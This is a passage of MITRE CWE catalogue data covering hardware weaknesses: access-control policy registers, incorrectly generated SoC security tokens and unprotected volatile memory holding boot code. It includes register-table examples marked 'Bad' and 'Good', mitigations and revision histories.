"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-08-20",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Agents Included in Control Policy are not Contained in Less-Privileged Policy",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Consider a system of seven registers for storing and configuring an AES key for encryption or decryption.\n\n\nFour 32-bit registers are used to store a 128-bit AES key. The names of those registers are AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, and AES_ENC_DEC_KEY_3. Collectively these are referred to as the AES Key registers.\n\n| Register | Field description | \n| --- | --- |\n| AES_ENC_DEC_KEY_0 | AES key [0:31] for encryption or decryption Default 0x00000000 |\n| AES_ENC_DEC_KEY_1 | AES key [32:63] for encryption or decryption Default 0x00000000 |\n| AES_ENC_DEC_KEY_2 | AES key [64:95] for encryption or decryption Default 0x00000000 |\n| AES_ENC_DEC_KEY_3 | AES key [96:127] for encryption or decryption Default 0x00000000 |\n\n\t\nThree 32-bit registers are used to define access control for the AES-key registers. The names of those registers are AES_KEY_CONTROL_POLICY, AES_KEY_READ_POLICY, and AES_KEY_WRITE_POLICY. Collectively these registers are referred to as the Policy registers, and their functions are explained next.\n\n\t\n - The AES_KEY_CONTROL_POLICY register defines which agents can write to the AES_KEY_READ_POLICY or AES_KEY_WRITE_POLICY registers.\n\n - The AES_KEY_READ_POLICY register defines which agents can read the AES-key registers.\n\n - The AES_KEY_WRITE_POLICY register defines which agents can write the AES key registers.\n\nThe preceding three policy registers encode access control at the bit level. Therefore a maximum of 32 agents can be defined (1 bit per agent). The value of the bit when set (i.e., \"1\") allows the respective action from an agent whose identity corresponds to the number of the bit. If clear (i.e., \"0\"), it disallows the respective action to that corresponding agent. For example, if bit 0 is set to \"1\" in the AES_KEY_READ_POLICY register, then agent 0 has permission to read the AES-key registers.\n\t\nConsider that there are 4 agents named Agent 1, Agent 2, Agent 3, and Agent 4. For access control purposes Agent 1 is assigned to bit 1, Agent 2 to bit 2, Agent 3 to bit 3, and Agent 4 to bit 4. All agents are trusted except for Agent 3 who is untrusted. Also consider the register values in the below table.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "| Register | Field description | \n| --- | --- |\n| AES_KEY_CONTROL_POLICY | Controls which agents can write to READ_POLICY and WRITE_POLICY registers [31:0] Default 0x00000018 |\n| AES_KEY_READ_POLICY | Controls which agents can read the AES-key registers [31:0] Default 0x00000002 |\n| AES_KEY_WRITE_POLICY | Controls which agents can write to the AES-key registers [31:0] Default 0x00000004 |",
"IntroText": null,
"Language": null,
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "IThe AES_KEY_CONTROL_POLICY register value is 0x00000018. In binary, the lower 8 bits will be 0001 1000, meaning that:\n\n\n - Bits 3 and 4 are set, thus Agents 3 and 4 will have write access to AES_KEY_READ_POLICY or AES_KEY_WRITE_POLICY.\n\n - All other bits are clear, hence agents other than 3 and 4 will not have access to write to AES_KEY_READ_POLICY or AES_KEY_WRITE_POLICY.\n\nThe AES_KEY_READ_POLICY register value is 0x00000002. In binary, the lower 8 bits will be 0000 0010, meaning that:\n\n - Bit 1 is set, thus Agent 1 will be able to read the AES key registers.\n\nThe AES_KEY_WRITE_POLICY register value is 0x00000004. In binary, the lower 8 bits will be 0000 0100, meaning that:\n\n - Bit 2 is set, thus Agent 2 will be able to write the AES Key registers.\n\nThe configured access control policy for Agents 1,2,3,4 is summarized in table below.\n| Agent | Read | Write | Control | \n| --- | --- | --- | --- |\n| Agent 1 | Allowed | Not Allowed | Not Allowed |\n| Agent 2 | Not Allowed | Allowed | Not Allowed |\n| Agent 3 | Not Allowed | Not Allowed | Allowed |\n| Agent 4 | Not Allowed | Not Allowed | Allowed |\n\n\t\nAt this point Agents 3 and 4 can only configure which agents can read AES keys and which agents can write AES keys. Agents 3 and 4 cannot read or write AES keys - just configure access control.\n\n\t\nNow, recall Agent 3 is untrusted. As explained above, the value of the AES_KEY_CONTROL_POLICY register gives agent 3 access to write to the AES_KEY_WRITE_POLICY register. Agent 3 can use this write access to add themselves to the AES_KEY_WRITE_POLICY register. This is accomplished by Agent 3 writing the value 0x00000006. In binary, the lower 8 bits are 0000 0110, meaning that bit 3 will be set. Thus, giving Agent 3 having the ability to write to the AES Key registers.\n\n\t\nIf the AES_KEY_CONTROL_POLICY register value is 0x00000010, the lower 8 bits will be 0001 0000. This will give Agent 4, a trusted agent, write access to AES_KEY_WRITE_POLICY, but Agent 3, who is untrusted, will not have write access. The Policy register values should therefore be as follows:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "| Register | Field description | \n| --- | --- |\n| AES_KEY_CONTROL_POLICY | [31:0] Default 0x00000010 |\n| AES_KEY_READ_POLICY | [31:0] Default 0x00000002 |\n| AES_KEY_WRITE_POLICY | [31:0] Default 0x00000004 |",
"IntroText": null,
"Language": null,
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1268"
]
] |
[] |
1270
|
Generation of Incorrect Security Tokens
|
Base
|
Simple
|
Incomplete
|
The product implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens generated in the system are incorrect.
|
Systems-On-a-Chip (SoC) (Integrated circuits and hardware engines) implement Security Tokens to differentiate and identify actions originated from various agents. These actions could be "read", "write", "program", "reset", "fetch", "compute", etc. Security Tokens are generated and assigned to every agent on the SoC that is either capable of generating an action or receiving an action from another agent. Every agent could be assigned a unique, Security Token based on its trust level or privileges. Incorrectly generated Security Tokens could result in the same token used for multiple agents or multiple tokens being used for the same agent. This condition could result in a Denial-of-Service (DoS) or the execution of an action that in turn could result in privilege escalation or unintended access.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Files or Directories",
"Execute Unauthorized Code or Commands",
"Bypass Protection Mechanism",
"Gain Privileges or Assume Identity",
"Read Memory",
"Modify Memory",
"DoS: Crash, Exit, or Restart"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "\n\n - Generation of Security Tokens should be reviewed for design inconsistency and common weaknesses.\n\n - Security-Token definition and programming flow should be tested in pre-silicon and post-silicon testing.\n\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation"
],
"Strategy": null
}
] | null | null | null |
[
"121",
"633",
"681"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-03-06",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.1",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Relationships",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-08-20",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Generation of Incorrect Security Identifiers",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Consider a system with a register for storing an AES key for encryption or decryption. The key is 128 bits long implemented as a set of four 32-bit registers. The key registers are assets, and register, AES_KEY_ACCESS_POLICY, is defined to provide necessary access controls. The access-policy register defines which agents, using a Security Token, may access the AES-key registers. Each bit in this 32-bit register is used to define a Security Token. There could be a maximum of 32 Security Tokens that are allowed access to the AES-key registers. When set (bit = \"1\") bit number allows action from an agent whose identity matches that bit number. If Clear (bit = \"0\") the action is disallowed for the corresponding agent.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "Assume the system has two agents: a Main-controller and an Aux-controller. The respective Security Tokens are \"1\" and \"2\". \n| Register | Description | Default | \n| --- | --- | --- |\n| AES_ENC_DEC_KEY_0 | AES key [0:31] for encryption or decryption | 0x00000000 |\n| AES_ENC_DEC_KEY_1 | AES key [32:63] for encryption or decryption | 0x00000000 |\n| AES_ENC_DEC_KEY_2 | AES key [64:95] for encryption or decryption | 0x00000000 |\n| AES_ENC_DEC_KEY_3 | AES key [96:127] for encryption or decryption | 0x00000000 |\n| AES_KEY_ACCESS_POLICY | AES key access register [31:0] | 0x00000002 |",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "An agent with a Security Token \"1\" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers. As per the above access policy, the AES-Key-access policy allows access to the AES-key registers if the security Token is \"1\".",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "The SoC incorrectly generates Security Token \"1\" for every agent. In other words, both Main-controller and Aux-controller are assigned Security Token \"1\".",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Both agents have access to the AES-key registers.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "The SoC should correctly generate Security Tokens, assigning \"1\" to the Main-controller and \"2\" to the Aux-controller",
"IntroText": null,
"Language": "Other",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1270"
]
] |
[] |
1274
|
Improper Access Control for Volatile Memory Containing Boot Code
|
Base
|
Simple
|
Stable
|
The product conducts a secure-boot process that transfers bootloader code from Non-Volatile Memory (NVM) into Volatile Memory (VM), but it does not have sufficient access control or other protections for the Volatile Memory.
|
Adversaries could bypass the secure-boot process and execute their own untrusted, malicious boot code.
As a part of a secure-boot process, the read-only-memory (ROM) code for a System-on-Chip (SoC) or other system fetches bootloader code from Non-Volatile Memory (NVM) and stores the code in Volatile Memory (VM), such as dynamic, random-access memory (DRAM) or static, random-access memory (SRAM). The NVM is usually external to the SoC, while the VM is internal to the SoC. As the code is transferred from NVM to VM, it is authenticated by the SoC's ROM code.
If the volatile-memory-region protections or access controls are insufficient to prevent modifications from an adversary or untrusted agent, the secure boot may be bypassed or replaced with the execution of an adversary's code.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "This weakness can be introduced during hardware architecture or design but can be identified later during testing.",
"Phase": "Architecture and Design"
}
] |
[
{
"Impact": [
"Modify Memory",
"Execute Unauthorized Code or Commands",
"Gain Privileges or Assume Identity"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Access Control",
"Integrity"
]
}
] |
[
{
"Description": "Ensure that the design of volatile-memory protections is enough to prevent modification from an adversary or untrusted code.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Test the volatile-memory protections to ensure they are safe from modification or untrusted code.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Testing"
],
"Strategy": null
}
] |
[
{
"Description": "Locked memory regions may be modified through other interfaces in a secure-boot-loader image due to improper access control.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2019-2267",
"Reference": "CVE-2019-2267"
}
] | null | null |
[
"456",
"679"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-04-25",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.1",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, Relationships, Weakness_Ordinalities",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "suggested content improvements",
"ContributionDate": "2021-10-20",
"ContributionName": "Narasimha Kumar V Mangipudi",
"ContributionOrganization": "Lattice Semiconductor",
"ContributionReleaseDate": null,
"ContributionType": "Feedback",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "provided detection method",
"ContributionDate": "2021-10-22",
"ContributionName": "Hareesh Khattri",
"ContributionOrganization": "Intel Corporation",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2021-10-28",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Insufficient Protections on the Volatile Memory Containing Boot Code",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] |
[
{
"Description": "Ensure the volatile memory is lockable or has locks. Ensure the volatile memory is locked for writes from untrusted agents or adversaries. Try modifying the volatile memory from an untrusted agent, and ensure these writes are dropped.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Manual Analysis"
},
{
"Description": "\n\nAnalyze the device using the following steps:\n\n\n 1. Identify all fabric master agents that are active during system Boot Flow when initial code is loaded from Non-volatile storage to volatile memory.\n\n 1. Identify the volatile memory regions that are used for storing loaded system executable program.\n\n 1. During system boot, test programming the identified memory regions in step 2 from all the masters identified in step 1.\n\nOnly trusted masters should be allowed to write to the memory regions. For example, pluggable device peripherals should not have write access to program load memory regions.",
"DetectionMethodID": null,
"Effectiveness": "Moderate",
"EffectivenessNotes": null,
"Method": "Manual Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "A typical SoC secure boot's flow includes fetching the next piece of code (i.e., the boot loader) from NVM (e.g., serial, peripheral interface (SPI) flash), and transferring it to DRAM/SRAM volatile, internal memory, which is more efficient.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "The volatile-memory protections or access controls are insufficient.",
"IntroText": null,
"Language": null,
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The memory from where the boot loader executes can be modified by an adversary.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "A good architecture should define appropriate protections or access controls to prevent modification by an adversary or untrusted agent, once the bootloader is authenticated.",
"IntroText": null,
"Language": null,
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1274"
]
] |
[] |
1276
|
Hardware Child Block Incorrectly Connected to Parent System
|
Base
|
Simple
|
Incomplete
|
Signals between a hardware IP and the parent system design are incorrectly connected causing security risks.
|
Individual hardware IP must communicate with the parent system in order for the product to function correctly and as intended. If implemented incorrectly, while not causing any apparent functional issues, may cause security issues. For example, if the IP should only be reset by a system-wide hard reset, but instead the reset input is connected to a software-triggered debug mode reset (which is also asserted during a hard reset), integrity of data inside the IP can be violated.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "This weakness is introduced when integrating IP into a parent design.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Varies by Context"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability"
]
}
] |
[
{
"Description": "System-level verification may be used to ensure that components are correctly connected and that design security requirements are not violated due to interactions between various IP blocks.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Testing"
],
"Strategy": null
}
